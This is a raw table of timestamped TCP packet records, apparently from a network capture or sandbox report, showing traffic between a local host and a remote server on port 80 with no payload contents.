Feb 22, 2021 09:14:48.733259916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733282089 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733309031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733331919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733345032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733357906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733370066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733402014 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733408928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733428955 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733432055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733473063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733486891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733491898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733494043 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733506918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733515024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733552933 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733566999 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733622074 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763151884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763200998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763228893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763248920 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763257980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763287067 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763294935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763333082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763344049 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763365984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763392925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763408899 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763426065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763456106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763470888 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763484001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763510942 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763525963 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763537884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763565063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763578892 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763593912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763622046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763641119 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763664961 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763705969 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763714075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.763736963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.763788939 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.792871952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.792923927 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.792965889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793006897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793011904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793049097 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793088913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793103933 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793145895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793167114 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793190002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793231964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793268919 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793279886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793323994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793351889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793368101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793437958 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793451071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793482065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793524981 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793555975 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793565989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793610096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793625116 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793652058 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793700933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793714046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.793745041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793786049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.793800116 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.821741104 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821779013 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821806908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821832895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821846962 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.821851015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821875095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.821876049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821899891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821909904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.821924925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821938038 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.821949959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821973085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.821995974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822011948 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822022915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822038889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822047949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822072983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822093964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822110891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822118998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822141886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822143078 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822168112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822180986 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822191000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822217941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822241068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822257042 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.822257996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.822283983 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.851171017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851227045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851249933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851274014 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851298094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851341963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851358891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851381063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851404905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851423025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851439953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851458073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851485014 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851505041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.851641893 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.851836920 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.176091909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.176125050 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.176140070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.176273108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.254597902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254631042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254647970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254667044 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254683971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254699945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254715919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254729986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254749060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254760027 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.254766941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254782915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254798889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254810095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.254813910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254829884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254844904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254862070 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.254869938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.254952908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254971027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.254987001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255002975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255017996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255038023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255055904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255072117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255089045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.255098104 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.255114079 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.255120039 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.255124092 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.255165100 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.273648024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273667097 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273679972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273693085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273705959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273720026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273741007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273758888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273777008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273785114 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.273792028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273808002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273823977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273828983 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.273847103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273857117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273873091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.273897886 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.273916006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274106979 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274126053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274142027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274161100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274178028 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274180889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274198055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274214029 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274224043 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274230003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274245024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274255991 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274261951 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274296045 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274681091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274704933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274722099 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274738073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274755001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274756908 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274770975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274786949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274801016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.274801970 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.274831057 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.295852900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295862913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295869112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295886040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295918941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295936108 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295948982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295967102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.295979023 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.295984030 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296000004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296016932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296025038 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296029091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296041965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296058893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296070099 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296152115 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296164036 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296195984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296205044 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296216965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296230078 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296242952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296255112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296272039 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296288013 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296303034 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296307087 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296324015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296343088 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296386003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296844006 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296864986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296880960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296896935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296912909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296927929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296941996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.296950102 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.296978951 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.315546989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315567017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315581083 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315593004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315604925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315615892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315628052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315640926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315654993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315666914 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315680027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315690994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315700054 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315871000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315896988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315913916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315929890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315948963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315965891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315982103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.315998077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316015005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316030979 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316042900 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316047907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316063881 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316083908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316101074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316117048 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316133022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316181898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316797972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316812992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316838980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316857100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316873074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316888094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316905022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316920042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316936016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316939116 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316948891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.316962957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316975117 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.316997051 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.317421913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317431927 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317454100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317471027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317487001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317500114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.317553043 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.317569971 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.346785069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346812963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346828938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346846104 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346860886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346877098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346889973 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.346893072 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346910954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346920967 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.346929073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346945047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346961021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346971989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.346976995 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.346997023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347003937 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347004890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347021103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347054005 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347110987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347202063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347215891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347228050 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347239971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347253084 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347264051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347276926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347290039 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347296000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347311020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347325087 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347347021 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347368956 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347407103 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347812891 CET	80	49761	172.67.172.17	192.168.2.4
